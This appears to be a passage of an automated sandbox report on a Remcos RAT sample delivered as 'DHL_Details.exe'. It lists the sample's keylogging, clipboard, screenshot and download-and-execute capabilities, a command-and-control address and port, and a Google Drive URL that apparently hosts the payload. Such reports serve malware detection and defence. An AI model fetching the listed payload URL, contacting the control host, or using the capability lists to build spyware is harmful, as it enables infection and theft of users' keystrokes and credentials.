Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_10538B11 getenv,FindFirstFileA,FindClose,GetLastError,GetLastError,FindClose,12_2_10538B11
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_10535FD6 _EH_prolog,socket,connect,_CxxThrowException,FindFirstFileW,_CxxThrowException,FindNextFileW,_CxxThrowException,_CxxThrowException,FindClose,atoi,_CxxThrowException,atoi,FindClose,RtlExitUserThread,12_2_10535FD6
Contains functionality to query local drivesShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00403B9A ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ,?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$ch12_2_00403B9A

Networking:

barindex
Contains functionality to download and execute PE filesShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_1053EDB5 URLDownloadToFileW,ShellExecuteW,??3@YAXPAX@Z,12_2_1053EDB5
Detected TCP or UDP traffic on non-standard portsShow sources
Source: global trafficTCP traffic: 192.168.2.6:49943 -> 185.140.53.106:2404
IP address seen in connection with other malwareShow sources
Source: Joe Sandbox ViewIP Address: 216.58.215.225 216.58.215.225
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: unknown unknown
JA3 SSL client fingerprint seen in connection with other malwareShow sources
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Contains functionality to download additional files from the internetShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00403463 ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,recv,?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,12_2_00403463
Found strings which match to known social media urlsShow sources
Source: ieinstal.exe, 00000013.00000002.2663998039.0000000000400000.00000040.00000001.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: ieinstal.exe, 00000013.00000002.2663998039.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: doc-0c-9s-docs.googleusercontent.com
Urls found in memory or binary dataShow sources
Source: DHL_Details.exe, 00000000.00000003.1148432850.00000000009A5000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: DHL_Details.exe, 00000000.00000002.1150176663.0000000000970000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/GTS1O1.crl0
Source: DHL_Details.exe, 00000000.00000002.1150176663.0000000000970000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/GTS1OZ
Source: DHL_Details.exe, 00000000.00000002.1150176663.0000000000970000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: DHL_Details.exe, 00000000.00000002.1150176663.0000000000970000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.=
Source: DHL_Details.exe, 00000000.00000003.1148432850.00000000009A5000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog
Source: DHL_Details.exe, 00000000.00000002.1150176663.0000000000970000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gsr202
Source: DHL_Details.exe, 00000000.00000002.1150176663.0000000000970000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gts1o10
Source: DHL_Details.exe, 00000000.00000003.1148432850.00000000009A5000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gts1oj:
Source: DHL_Details.exe, 00000000.00000003.1148432850.00000000009A5000.00000004.00000001.sdmpString found in binary or memory: http://pki.go
Source: DHL_Details.exe, 00000000.00000003.1148432850.00000000009A5000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: ieinstal.exe, 00000013.00000002.2663998039.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.ebuddy.com
Source: DHL_Details.exe, 00000000.00000002.1150176663.0000000000970000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/support/accounts/answer/151657?hl=en
Source: ieinstal.exe, 00000013.00000002.2663998039.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.imvu.com
Source: ieinstal.exe, 00000013.00000002.2663998039.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: ieinstal.exe, 00000013.00000002.2663998039.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.imvu.comr
Source: ieinstal.exe, 00000013.00000002.2665980703.000000000390C000.00000004.00000040.sdmpString found in binary or memory: http://www.imvu.comta
Source: ieinstal.exe, 00000014.00000002.2662959040.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.nirsoft.net/
Source: DHL_Details.exe, 00000000.00000002.1150176663.0000000000970000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: DHL_Details.exe, 00000000.00000003.1148432850.00000000009A5000.00000004.00000001.sdmpString found in binary or memory: https://doc-0c-9s-docs.googleusercontent.com/
Source: DHL_Details.exe, 00000000.00000002.1150110460.000000000094A000.00000004.00000020.sdmpString found in binary or memory: https://doc-0c-9s-docs.googleusercontent.com/0W
Source: DHL_Details.exe, 00000000.00000002.1150176663.0000000000970000.00000004.00000001.sdmpString found in binary or memory: https://doc-0c-9s-docs.googleusercontent.com/docs/securesc/7448b6q78tipvgk
Source: DHL_Details.exe, 00000000.00000002.1150110460.000000000094A000.00000004.00000020.sdmpString found in binary or memory: https://doc-0c-9s-docs.googleusercontent.com/docs/securesc/7448b6q78tipvgksrv0g7haa8csaak8p/qco2fohb
Source: DHL_Details.exe, 00000000.00000003.1148432850.00000000009A5000.00000004.00000001.sdmpString found in binary or memory: https://doc-0c-9s-docs.googleusercontent.com/i
Source: DHL_Details.exe, 00000000.00000003.1148432850.00000000009A5000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/
Source: DHL_Details.exe, 00000000.00000003.1148432850.00000000009A5000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/P
Source: DHL_Details.exe, 00000000.00000003.1148432850.00000000009A5000.00000004.00000001.sdmp, DHL_Details.exe, 00000000.00000003.1115700386.00000000009CF000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/nonceSigner?nonce=8et9054a24khs&continue=https://doc-0c-9s-docs.googleuserco
Source: DHL_Details.exe, 00000000.00000002.1150176663.0000000000970000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/
Source: DHL_Details.exe, 00000000.00000003.1148432850.00000000009A5000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/0
Source: DHL_Details.exe, 00000000.00000003.1148432850.00000000009A5000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/h
Source: DHL_Details.exe, 00000000.00000002.1150176663.0000000000970000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/k
Source: DHL_Details.exe, 00000000.00000002.1153823141.00000000042DB000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/u/0/uc?id=1YeIhasQd-1KZ177FInnElYbHMifTTTeL&export=download
Source: DHL_Details.exe, 00000000.00000002.1150110460.000000000094A000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/u/0/uc?id=1YeIhasQd-1KZ177FInnElYbHMifTTTeL&export=download.J
Source: DHL_Details.exe, 00000000.00000002.1150176663.0000000000970000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/u/0/uc?id=1YeIhasQd-1KZ177FInnElYbHMifTTTeL&export=downloadm
Source: DHL_Details.exe, 00000000.00000002.1150176663.0000000000970000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com
Source: DHL_Details.exe, 00000000.00000002.1150176663.0000000000970000.00000004.00000001.sdmpString found in binary or memory: https://pki.goog/repository/0
Source: ieinstal.exe, 00000013.00000002.2663998039.0000000000400000.00000040.00000001.sdmpString found in binary or memory: https://www.google.com
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality to capture and log keystrokesShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Esc] 12_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Enter] 12_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Tab] 12_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Down] 12_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Right] 12_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Up] 12_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Left] 12_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [End] 12_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [F2] 12_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [F1] 12_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Del] 12_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Del] 12_2_00405DA6
Contains functionality to register a low level keyboard hookShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_10536B57 SetWindowsHookExA 0000000D,004051AE,00000000,0000000012_2_10536B57
Contains functionality for read data from the clipboardShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_0040D1E8 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trai12_2_0040D1E8
Contains functionality to read the clipboard dataShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_0040D1E8 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trai12_2_0040D1E8
Contains functionality to record screenshotsShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_0040F460 Sleep,CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,DeleteDC,DeleteDC,DeleteDC,DeleteObject,SelectObject,DeleteDC,DeleteDC,DeleteDC,DeleteObject,StretchBlt,DeleteDC,DeleteDC,DeleteDC,DeleteObject,DeleteObject,GetCursorInfo,GetIconInfo,DeleteObject,DeleteObject,DrawIcon,GetObjectA,DeleteDC,DeleteDC,DeleteDC,DeleteObject,LocalAlloc,GlobalAlloc,DeleteDC,DeleteDC,DeleteDC,DeleteObject,GetDIBits,DeleteDC,DeleteDC,DeleteDC,DeleteObject,GlobalFree,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,DeleteObject,GlobalFree,DeleteDC,DeleteDC,DeleteDC,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,12_2_0040F460
Creates a DirectInput object (often for capturing keystrokes)Show sources
Source: DHL_Details.exe, 00000000.00000002.1149987017.0000000000910000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Potential key logger detected (key state polling based)Show sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00405221 GetKeyState,GetKeyState,GetKeyState,CallNextHookEx,12_2_00405221

E-Banking Fraud:

barindex
Yara detected Remcos RATShow sources
Source: Yara matchFile source: 00000010.00000002.1206561253.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000C.00000002.1182878564.0000000010530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000C.00000002.1180913234.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000010.00000002.1208688497.0000000010530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: ieinstal.exe PID: 4764, type: MEMORY
Source: Yara matchFile source: Process Memory Space: ieinstal.exe PID: 5284, type: MEMORY
Source: Yara matchFile source: 16.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 12.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 12.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 12.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 16.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 16.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 16.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 12.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE

Spam, unwanted Advertisements and Ransom Demands:

barindex
Contains functionalty to change the wallpaperShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00412EE3 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,SystemParametersInfoW,12_2_00412EE3
